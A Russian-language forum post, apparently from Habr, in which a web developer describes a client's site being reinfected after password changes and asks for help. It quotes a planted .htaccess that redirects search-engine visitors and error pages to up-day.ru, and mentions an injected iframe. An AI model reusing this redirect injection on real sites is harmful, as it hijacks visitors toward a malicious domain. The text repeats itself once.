Добрый вечер, уважаемые хабравчане!
У меня сложилась неприятная ситуация. Сделал сайт клиенту. Он доволен, деньги получены.
Но через месяц я обнаружил что при заходе на сайт начинает ругаться антивирус Avira. Говорит, что страница заражена WebGen. Просмотрев index.php обнаружил, что в конце файла стоит iframe который загружает вредоносный код. Вроде бы дело ясное — полечил машину ( Avira, Avast затем cureit! ), сменил пароль на хостинге. Пароль никому не сообщал.
Прошел месяц, и я обнаруживаю более интересный момент: при заходе на сайт клиента, меня перебрасывает на другой сайт. Сразу же захожу на FTP. Смотрю index.php не тронут. А вот .htaccess выглядит вполне предсказуемо:
Лечу машину ( теми же антивирусами, что перечислены выше ), меняю пароль, заливаю старый .htaccess. Все счастливы. Но не тут то было. Проходит меньше 12 часов и я снова наблюдаю прежнюю картину. Замете, пароль никому не сообщал. Проверяю машину — все чисто. Меняю пароль снова, уже в третий раз. Снова проходит менее пол-дня и сайт инфицирован. Клиент в панике, доверие утрачено.
Но проблема так и не решена. Возможно кто нибудь сталкивался с подобного рода заразой или имеет мысли на этот счет?
Возможно, я не одинок в такого вида проблеме?
В любом случае я заранее благодарен всем кто откликнется на мою просьбу о помощи.
PS Отписал в абьюз регистратора up-day.ru. Будет ли толк.
PPS Абьюз ответил, что у него лишь регистрировали имя. И что нужно писать именно хостеру. Написал, жду.
У меня сложилась неприятная ситуация. Сделал сайт клиенту. Он доволен, деньги получены.
Но через месяц я обнаружил что при заходе на сайт начинает ругаться антивирус Avira. Говорит, что страница заражена WebGen. Просмотрев index.php обнаружил, что в конце файла стоит iframe который загружает вредоносный код. Вроде бы дело ясное — полечил машину ( Avira, Avast затем cureit! ), сменил пароль на хостинге. Пароль никому не сообщал.
Прошел месяц, и я обнаруживаю более интересный момент: при заходе на сайт клиента, меня перебрасывает на другой сайт. Сразу же захожу на FTP. Смотрю index.php не тронут. А вот .htaccess выглядит вполне предсказуемо:
# HostRule
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule ^(.*)$ up-day.ru [R=301,L]
ErrorDocument 401 up-day.ru
ErrorDocument 403 up-day.ru
ErrorDocument 404 up-day.ru
ErrorDocument 500 up-day.ru
# /HostRule
Лечу машину ( теми же антивирусами, что перечислены выше ), меняю пароль, заливаю старый .htaccess. Все счастливы. Но не тут то было. Проходит меньше 12 часов и я снова наблюдаю прежнюю картину. Замете, пароль никому не сообщал. Проверяю машину — все чисто. Меняю пароль снова, уже в третий раз. Снова проходит менее пол-дня и сайт инфицирован. Клиент в панике, доверие утрачено.
Но проблема так и не решена. Возможно кто нибудь сталкивался с подобного рода заразой или имеет мысли на этот счет?
Возможно, я не одинок в такого вида проблеме?
В любом случае я заранее благодарен всем кто откликнется на мою просьбу о помощи.
PS Отписал в абьюз регистратора up-day.ru. Будет ли толк.
PPS Абьюз ответил, что у него лишь регистрировали имя. И что нужно писать именно хостеру. Написал, жду.
